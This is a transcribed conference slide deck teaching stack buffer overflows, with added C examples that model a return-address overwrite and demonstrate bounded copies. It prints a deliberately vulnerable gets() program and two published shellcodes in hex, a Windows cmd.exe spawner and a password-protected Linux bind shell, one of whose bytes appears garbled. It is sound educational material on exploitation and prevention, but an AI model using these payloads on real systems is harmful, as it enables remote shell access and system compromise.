Buffer Overflow Demo by Saurabh Sharma

Presented at the null Bangalore Meet, June 2010



  1. Buffer Overflows, by Saurabh Sharma
  2. Buffer
  3. Anatomy of Buffer Overflows
     Buffer: the memory area where user input is stored.
     Overflow: the user input exceeds the maximum size of the buffer, overwriting and corrupting the adjacent areas of memory.
  4. A small example

         #include <stdio.h>

         /* Deliberately vulnerable, as on the slide: gets() has no idea how
            large buf is, so it keeps writing past the end of the 1024 bytes. */
         void get_input(void) {
             char buf[1024];
             gets(buf);
         }

         int main(int argc, char *argv[]) {
             get_input();
             return 0;
         }

     The user controls the input, so a malicious user can supply more than 1024 characters. So what? The extra bytes land on whatever sits after buf on the stack, and a crafted input can make the program execute some other executable. That executable can be cmd.exe, which may lead to system compromise.
  5. Memory overview
     Text: contains instructions
     Data: contains initialized variables
     BSS: contains uninitialized global and static variables (initialized to 0)
     Heap: contains dynamic, uninitialized data allocated with malloc()
     Stack: contains function arguments and local variables
  6. Memory overview
     Stack frame: holds the variables and data for one function call.
     The stack grows from higher memory addresses to lower ones; the heap grows from lower to higher.
  7. Registers
     General purpose: for basic calculations
     ESI, EDI: used mostly with arrays (string and memory operations)
     Flags: the outcome of many instructions sets the flags
     Segment: code, stack, data
     EBP: base pointer, points to the beginning of the current stack frame
     ESP: stack pointer, points to the top of the stack
     EIP: instruction pointer, points to the next instruction
  8. Stack Layout
     The stack is a LIFO data structure: temporary memory that is formed when a function is called. A new stack frame is created for each call. The return address is saved just above the local variables (at a higher address), with the saved EBP between them:

         higher address   function parameters
                          return address (saved EIP)
                          saved EBP
                          local variables (e.g. buf)
         lower address    top of stack (ESP); the stack grows downward

     A buffer is filled from its lowest address upward, so input that runs past the end of the local variables overwrites the saved EBP first and then the saved EIP.
  9. Stack Layout
     So, if the saved EIP can be controlled, the next instruction executed when the function returns can be controlled. (The slide repeats the layout from slide 8.)
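Added example, not from the slides and not the author's code: a model of the frame drawn on slides 8 and 9, with the unchecked copy from slide 4 beside a bounded one, so the bytes that run past the buffer can be watched landing on the saved EIP. A flat byte array stands in for the stack (which keeps the demonstration free of undefined behaviour); the 16-byte buffer, the 4-byte saved EBP and return-address slots, and the values 0x08048500 and 0xdeadbeef are assumptions for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides. A flat byte array stands in for the
 * x86 stack frame of slides 8/9 so the overwrite is observable without
 * undefined behaviour. Layout, low address -> high address:
 *   [ buf (16 bytes) ][ saved EBP (4) ][ return address (4) ]
 * Sizes are illustrative assumptions; a real frame also carries compiler
 * padding and, with /GS, a cookie in front of the saved EBP. */
enum { BUF_SIZE = 16, FRAME_SIZE = BUF_SIZE + 4 + 4 };
enum { OFF_BUF = 0, OFF_SAVED_EBP = BUF_SIZE, OFF_RET = BUF_SIZE + 4 };

/* Read the return-address slot back in host byte order. */
static uint32_t frame_ret(const unsigned char *frame)
{
    uint32_t v;
    memcpy(&v, frame + OFF_RET, sizeof v);
    return v;
}

/* Fresh frame holding a legitimate return address (assumed value). */
static void frame_init(unsigned char *frame, uint32_t ret)
{
    memset(frame, 0, FRAME_SIZE);
    memcpy(frame + OFF_RET, &ret, sizeof ret);
}

/* The bug from slide 4: copy attacker bytes into buf with no length check.
 * Everything past BUF_SIZE spills over the saved EBP and then the saved EIP.
 * (Clamped to FRAME_SIZE only so the model itself stays in bounds.) */
static uint32_t vulnerable_copy(unsigned char *frame,
                                const unsigned char *input, size_t len)
{
    size_t n = len < FRAME_SIZE ? len : FRAME_SIZE;
    memcpy(frame + OFF_BUF, input, n);
    return frame_ret(frame);
}

/* Hardened copy: never writes more than buf can hold. */
static uint32_t bounded_copy(unsigned char *frame,
                             const unsigned char *input, size_t len)
{
    size_t n = len < BUF_SIZE ? len : BUF_SIZE;
    memcpy(frame + OFF_BUF, input, n);
    return frame_ret(frame);
}

/* Classic payload: padding up to the return-address slot, then the value
 * the attacker wants EIP to take. Returns payload length, 0 if out is small. */
static size_t build_payload(unsigned char *out, size_t outlen, uint32_t target)
{
    if (outlen < OFF_RET + sizeof target) return 0;
    memset(out, 'A', OFF_RET);                     /* fills buf and saved EBP */
    memcpy(out + OFF_RET, &target, sizeof target); /* lands on the saved EIP */
    return OFF_RET + sizeof target;
}

/* Run one copy against a fresh frame; returns what the saved EIP holds after. */
static uint32_t run_demo(int bounded)
{
    unsigned char frame[FRAME_SIZE], payload[FRAME_SIZE];
    size_t len = build_payload(payload, sizeof payload, 0xdeadbeefu);
    frame_init(frame, 0x08048500u);                /* assumed real return address */
    return bounded ? bounded_copy(frame, payload, len)
                   : vulnerable_copy(frame, payload, len);
}

int main(void)
{
    printf("offset of saved EIP from start of buf: %d bytes\n", (int)OFF_RET);
    printf("saved EIP after unchecked copy: 0x%08x\n", (unsigned)run_demo(0));
    printf("saved EIP after bounded copy:   0x%08x\n", (unsigned)run_demo(1));
    return 0;
}
```

The offset that matters for the demo is OFF_RET: buffer size plus the saved EBP. In a real binary that number comes from the compiler's frame layout, which is why exploit writers measure it with a debugger rather than computing it from the source.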
  10. Shellcode
     Machine code which is injected into the overflowed buffer. It does the work for you: executing a third program, adding an administrator, etc.
  11. Example shellcodes (small)
     win32/xp sp2 (En) cmd.exe, 23 bytes. Author: Mountassif Moad A.K.A :

         unsigned char shellcode[] =
             "\x8b\xec"              /* mov ebp, esp                              */
             "\x68\x65\x78\x65\x20"  /* push "exe "                               */
             "\x68\x63\x6d\x64\x2e"  /* push "cmd."  -> "cmd.exe " now at esp     */
             "\x8d\x45\xf8"          /* lea eax, [ebp-8]  (address of the string) */
             "\x50"                  /* push eax          (the command line)      */
             "\xb8\x8d\x15\x86\x7c"  /* mov eax, 0x7c86158d: API address hard-coded
                                        for the XP SP2 (En) kernel32, which ties
                                        the code to that one build               */
             "\xff\xd0";             /* call eax                                  */

  12. Example shellcodes (bigger)
     Linux x86 (int 0x80) bind shell by NRAZIZ. Binds to port 48138, password: haxor. The comments mark where each stage starts; instruction boundaries do not line up with the line breaks. The code assumes the listening socket gets fd 3 and the accepted connection fd 4.

         char bindcode[] =
             /* socket(AF_INET, SOCK_STREAM, 0) via socketcall */
             "\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
             /* bind(3, {AF_INET, port 0x0abc = 48138, INADDR_ANY}, 16) */
             "\x31\xd2\x52\x66\x68\xbc\x0a\x66\x6a\x02\x89\xe2\x6a"
             "\x10\x52\x6a\x03\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x6a"
             /* listen(3, 2) */
             "\x02\x6a\x03\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xc9"
             /* accept(3, NULL, NULL) */
             "\x51\x51\x6a\x03\x89\xe1\xfe\xc3\xb0\x66\xcdx80\x31"
             /* send(4, "Pass:", 5): prompt the client */
             "\xdb\x53\x6a\x3a\x68\x50\x61\x73\x73\x89\xe6\x6a\x05"
             "\x56\x6a\x04\x89\xe1\xb3\x09\xb0\x66\xcd\x80\x31\xc9"
             /* recv(4, buf, 5, 0) */
             "\x31\xf6\x51\x6a\x05\x52\x6a\x04\x89\xe1\xb3\x0a\xb0"
             /* repe cmpsb against "haxor"; on mismatch jump back to the prompt */
             "\x66\xcd\x80\x31\xc9\x51\x6a\x72\x68\x68\x61\x78\x6f"
             "\x89\xe7\x89\xd6\x80\xc1\x05\xfc\xf3\xa6\x75\xbf\x31"
             /* dup2(4, 0), dup2(4, 1), dup2(4, 2) in a loop */
             "\xc9\xb3\x04\xb0\x3f\xcd\x80\x41\x83\xf9\x03\x75\xf6"
             /* execve("/bin//sh", ["/bin//sh", NULL], NULL), then exit */
             "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             "\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0"
             "\x01\xcd\x80";
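Added example, not from the slides and not code by either shellcode author: two encoding details both shellcodes above rely on, written out so the raw bytes can be checked against the slides. The first is putting a string on the stack with `push imm32`, four bytes at a time and in reverse order (the "cmd.exe " pushes in the 23-byte shellcode, the "/bin//sh" pushes in the bind shell); the second is pushing a port as a 16-bit immediate in network byte order (the `\x66\x68\xbc\x0a` that encodes 48138 in the bind shell). The helper names are mine; the 23-byte sequence is the one on slide 11.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides. Reproduces two encodings used by the
 * shellcodes above so their bytes can be verified rather than trusted. */

/* Emit the `push imm32` (opcode 0x68) sequence that leaves s on the stack.
 * s must be a multiple of 4 bytes long. The last chunk is pushed first:
 * the stack grows down, so the final push ends up at the lowest address
 * and the string reads forward from ESP. Returns bytes written, 0 on error. */
static size_t encode_push_string(const char *s, unsigned char *out, size_t outlen)
{
    size_t len = strlen(s), pos = 0;
    if (len == 0 || len % 4 != 0 || outlen < (len / 4) * 5) return 0;
    for (size_t i = len; i >= 4; i -= 4) {
        out[pos++] = 0x68;                 /* push imm32 */
        memcpy(out + pos, s + i - 4, 4);   /* chunk bytes, already in memory order */
        pos += 4;
    }
    return pos;
}

/* Emit `push word <port>` (0x66 operand-size prefix + 0x68) with the port in
 * network (big-endian) order, the form a sockaddr_in expects. */
static size_t encode_push_port(uint16_t port, unsigned char *out, size_t outlen)
{
    if (outlen < 4) return 0;
    out[0] = 0x66; out[1] = 0x68;
    out[2] = (unsigned char)(port >> 8);   /* high byte first */
    out[3] = (unsigned char)(port & 0xff);
    return 4;
}

/* A NUL byte truncates a payload delivered through strcpy()-style copies,
 * so "no NUL bytes" is the first check to run on any shellcode. */
static int has_nul_byte(const unsigned char *code, size_t len)
{
    return memchr(code, 0, len) != NULL;
}

/* The 23-byte cmd.exe shellcode from slide 11, for comparison. */
static const unsigned char cmd_exe_shellcode[] =
    "\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e"
    "\x8d\x45\xf8\x50\xb8\x8d\x15\x86\x7c\xff\xd0";

/* 1 if both encoders reproduce the bytes that appear on the slides:
 * bytes 2..11 of the cmd.exe shellcode and the port push of the bind shell. */
static int check_slide_encodings(void)
{
    unsigned char buf[16];
    size_t n = encode_push_string("cmd.exe ", buf, sizeof buf);
    if (n != 10 || memcmp(buf, cmd_exe_shellcode + 2, 10) != 0) return 0;
    n = encode_push_port(48138, buf, sizeof buf);
    if (n != 4 || memcmp(buf, "\x66\x68\xbc\x0a", 4) != 0) return 0;
    return 1;
}

int main(void)
{
    unsigned char buf[16];
    printf("encoders match the slides: %d\n", check_slide_encodings());
    printf("cmd.exe shellcode is NUL-free: %d\n", !has_nul_byte(cmd_exe_shellcode, 23));
    encode_push_port(80, buf, sizeof buf);
    printf("push word 80 = %02x %02x %02x %02x (contains a NUL byte)\n",
           buf[0], buf[1], buf[2], buf[3]);
    return 0;
}
```

The port-80 case shows why bind shells pick high ports such as 48138: any port below 256 puts a 0x00 in the immediate, and the payload would be cut off there by a string copy.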
  13. Demo
  14. Major snares
     strcpy()
     strcat()
     sprintf()
     scanf()
     sscanf()
     fscanf()
     vfscanf()
     vsprintf()
     vscanf()
     vsscanf()
     streadd()
     strecpy()
     strtrns()
  15. Prevention
     The buffer size must be checked on every write.
     Use bounded alternatives, e.g. strncpy(dst, src, dst_size-1) instead of strcpy(dst, src). Note that strncpy() writes no terminator when src is at least that long, so set dst[dst_size-1] = '\0' afterwards or the copy is still unsafe to read back.
     Other protection mechanisms: /GS (stack cookie), ASLR, SafeSEH compilation.
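Added example, not from the slides: the strncpy(dst, src, dst_size-1) replacement the prevention slide recommends, run exactly as written next to a version that adds the missing terminator, plus a bounded copy that also reports truncation. The 8-byte destination, the 'X' fill (standing in for stale stack contents) and the helper names are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides. strncpy() stops without writing a
 * terminator when src is at least n bytes long, so the slide's one-liner
 * leaves dst unterminated on long input and every later strlen()/printf()
 * reads past the buffer. DST_SIZE is an assumed size for the demo. */
#define DST_SIZE 8

/* 1 if a terminator exists within the first n bytes of buf. */
static int is_terminated(const char *buf, size_t n)
{
    return memchr(buf, '\0', n) != NULL;
}

/* Exactly the slide's suggestion, nothing else. dst is pre-filled with 'X'
 * to mimic a stack buffer holding stale bytes rather than zeros. */
static int copy_as_on_slide(char *dst, const char *src)
{
    memset(dst, 'X', DST_SIZE);
    strncpy(dst, src, DST_SIZE - 1);
    return is_terminated(dst, DST_SIZE);
}

/* Same strncpy, plus the terminator the slide's line omits. */
static int copy_fixed(char *dst, const char *src)
{
    memset(dst, 'X', DST_SIZE);
    strncpy(dst, src, DST_SIZE - 1);
    dst[DST_SIZE - 1] = '\0';
    return is_terminated(dst, DST_SIZE);
}

/* Bounded copy for callers that also need to know about truncation:
 * returns 0 on success, -1 if src did not fit (dst is still terminated). */
static int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0) return -1;
    if (len >= dst_size) {
        memcpy(dst, src, dst_size - 1);
        dst[dst_size - 1] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

int main(void)
{
    char dst[DST_SIZE];
    const char *attacker = "AAAAAAAAAAAAAAAA";   /* 16 bytes, longer than dst */

    printf("slide strncpy: terminated=%d\n", copy_as_on_slide(dst, attacker));
    printf("fixed strncpy: terminated=%d dst=\"%s\"\n", copy_fixed(dst, attacker), dst);
    printf("checked copy:  rc=%d dst=\"%s\"\n", copy_checked(dst, sizeof dst, attacker), dst);
    printf("checked copy:  rc=%d dst=\"%s\"\n", copy_checked(dst, sizeof dst, "ok"), dst);
    return 0;
}
```

Truncation is itself a security-relevant event (a path or command line silently cut short behaves differently from the one the caller checked), which is why copy_checked returns a status instead of hiding it.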
  17. Questions?
